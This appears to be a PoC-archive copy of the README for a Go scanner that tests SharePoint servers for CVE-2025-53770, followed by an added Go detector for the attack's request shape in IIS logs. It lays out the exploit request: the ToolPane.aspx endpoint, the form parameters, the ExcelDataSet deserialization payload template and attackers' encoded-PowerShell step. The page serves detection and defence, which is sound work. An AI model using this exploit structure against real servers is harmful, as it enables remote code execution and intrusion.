Related vulnerability
Description
Scanner for the SharePoint CVE-2025-53770 RCE zero-day vulnerability.
Introduction
# CVE-2025-53770
This is a scanner for [the SharePoint unauthenticated Remote Code Execution vulnerability](https://msrc.microsoft.com/blog/2025/07/customer-guidance-for-sharepoint-vulnerability-cve-2025-53770/), assigned CVE number CVE-2025-53770.
The code for this was written by reverse-engineering a payload seen in [the wild](https://raw.githubusercontent.com/kaizensecurity/CVE-2025-53770/refs/heads/master/payload).
Use at your own risk, I am not responsible for any negative impact this might cause.
## How does it work?
It tries to exploit the vulnerability by injecting [a marker](pkg/payload/test_payload.go) into the SharePoint ToolBox widget.
If this harmless marker is found in the SharePoint server's response, the host is marked as vulnerable.
## How to use
```zsh
# check if <TARGET-HOSTNAME> is vulnerable and try to extract version information
% ./CVE-2025-53770 [<TARGET-HOSTNAME> ...]
INFO[0000] set log level fields.level=info
INFO[0000] starting scanner targets=1
INFO[0001] detected SharePoint version target=<REDACTED> version="MicrosoftSharePointTeamServices: 16.0.0.5469\n"
WARN[0001] target is vulnerable target=<REDACTED>
# turn on debug logging and try retrieving SharePoint version information
% ./CVE-2025-53770 -log=debug -version <TARGET-HOSTNAME>
...
```
## Who is vulnerable?
Anyone running the *on-prem* version of SharePoint server without KB5002768 & KB5002754.
## How does this vulnerability work?
The vulnerability presumably builds upon a previously disclosed vulnerability for SharePoint, CVE-2025-49706.
By sending an HTTP POST request to `https://<TARGET>/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx` with a gzip-compressed, base64-encoded payload, you can achieve Remote Code Execution as the SharePoint runtime process.
Two form parameters are important here:
1. `MSOTlPn_Uri`: Control source path
   This pretends to reference a legitimate SharePoint control (AclEditor.ascx) and tricks SharePoint into allowing the web part edit.
   It seems to be a mock value used only to pass validation.
   The original malicious payload includes `MSOTlPn_Uri=https://<TARGET>%s/_controltemplates/15/AclEditor.ascx`, but the value does not appear to be used at this point.
2. `MSOTlPn_DWP`: Web part configuration
   This parameter injects custom ASP.NET directives (`<%@ Register %>`) and server-side markup (`<Scorecard:ExcelDataSet>`).
   The `CompressedDataTable` parameter holds attacker-controlled serialized data (gzip + base64), triggering the RCE.
This payload follows a certain structure:
```xml
<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>
<%@ Register Tagprefix="asp" Namespace="System.Web.UI" Assembly="System.Web.Extensions, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" %>
<asp:UpdateProgress ID="UpdateProgress1" DisplayAfter="10" runat="server" AssociatedUpdatePanelID="upTest">
<ProgressTemplate>
<div class="divWaiting">
<Scorecard:ExcelDataSet CompressedDataTable="<PAYLOAD-GZIPPED-BASE64-ENCODED>" DataTable-CaseSensitive="false" runat="server"></Scorecard:ExcelDataSet>
</div>
</ProgressTemplate>
</asp:UpdateProgress>
```
If a control like `Scorecard:ExcelDataSet` exists and its `CompressedDataTable` property is set, it's deserialized directly by the SharePoint DWP Parser.
The payload itself can be rather interesting, as it can contain a `System.DelegateSerializationHolder` which triggers a deserialization RCE.
Threat actors abused this to pass `/c powershell -EncodedCommand <POWERSHELL-PAYLOAD>` in their payload to achieve code execution.
In our case, we merely pass a static placeholder to prove exploitability:
```xml
<diffgr:diffgram xmlns:msdata="urn:schemas-microsoft-com:xml-msdata" xmlns:diffgr="urn:schemas-microsoft-com:xml-diffgram-v1">
<foo>
<bar diffgr:id="Table" msdata:rowOrder="0" diffgr:hasChanges="inserted">
<poc xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<TestWrapper>
<Info>This is a harmless CVE-2025-53770 PoC marker.</Info>
<Timestamp>2025-07-21T14:04:52Z</Timestamp>
</TestWrapper>
</poc>
</bar>
</foo>
</diffgr:diffgram>
```
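As an added example (not part of the scanner project or this README), a small Go program that flags the request shape described above in IIS W3C log lines: a POST to `/_layouts/15/ToolPane.aspx` whose query carries `DisplayMode=Edit&a=/ToolPane.aspx`, with method, path and query compared after case and URL-encoding normalisation. The log lines and their column order are constructed for this example; real IIS logs declare their columns in a `#Fields:` header, so check it before relying on the fixed indexes used here.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Constructed IIS W3C log excerpt (not real data; documentation-range client IPs).
const sampleLog = `#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2025-07-21 14:04:52 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 - 203.0.113.7 200
2025-07-21 14:05:10 10.0.0.5 GET /_layouts/15/ToolPane.aspx DisplayMode=Edit 443 CORP\jdoe 10.0.0.22 200
2025-07-21 14:05:30 10.0.0.5 POST /_layouts/15/toolpane.aspx displaymode=edit&a=%2FToolPane.aspx 443 - 198.51.100.9 302
2025-07-21 14:06:01 10.0.0.5 POST /_layouts/15/ToolPane.aspx DisplayMode=Edit&a=/ToolPane.aspx 443 CORP\admin 10.0.0.23 200`

// Hit is one request matching the ToolPane.aspx edit-mode POST shape.
type Hit struct {
	Time, ClientIP, Status string
	Anonymous              bool // cs-username was "-": no authenticated user
}

// MatchesToolPanePOST compares method, path and query case-insensitively
// (the query is lower-cased before parsing, which also decodes %2F-style escapes).
func MatchesToolPanePOST(method, stem, query string) bool {
	if !strings.EqualFold(method, "POST") ||
		!strings.HasSuffix(strings.ToLower(stem), "/_layouts/15/toolpane.aspx") {
		return false
	}
	q, _ := url.ParseQuery(strings.ToLower(query))
	return q.Get("displaymode") == "edit" && q.Get("a") == "/toolpane.aspx"
}

// ScanIISLog parses data lines in the #Fields: column order used above
// (index 3 method, 4 stem, 5 query, 7 user, 8 client IP, 9 status).
func ScanIISLog(logText string) []Hit {
	var hits []Hit
	for _, line := range strings.Split(logText, "\n") {
		f := strings.Fields(line)
		if strings.HasPrefix(line, "#") || len(f) < 10 { // skip directives/short lines
			continue
		}
		if MatchesToolPanePOST(f[3], f[4], f[5]) {
			hits = append(hits, Hit{f[0] + " " + f[1], f[8], f[9], f[7] == "-"})
		}
	}
	return hits
}

func main() { fmt.Printf("%+v\n", ScanIISLog(sampleLog)) }
```

An unauthenticated hit (`Anonymous=true`) on a server missing KB5002768/KB5002754 is the case to triage first; the authenticated one may be a legitimate web part edit.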
File snapshot
[4.0K] /data/pocs/49715adffd94f2b96e5fe2cd2856b471148a8c37
├── [4.0K] cmd
│ └── [2.7K] main.go
├── [ 848] Dockerfile
├── [ 169] go.mod
├── [1.6K] go.sum
├── [ 48] Makefile
├── [4.0K] pkg
│ └── [4.0K] payload
│ ├── [2.4K] extract.go
│ ├── [3.5K] payload.go
│ ├── [1.7K] test.go
│ └── [ 685] test_payload.go
└── [4.4K] README.md
3 directories, 10 files
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source is no longer available or cannot be reached, please send an e-mail to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. Shenlong has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.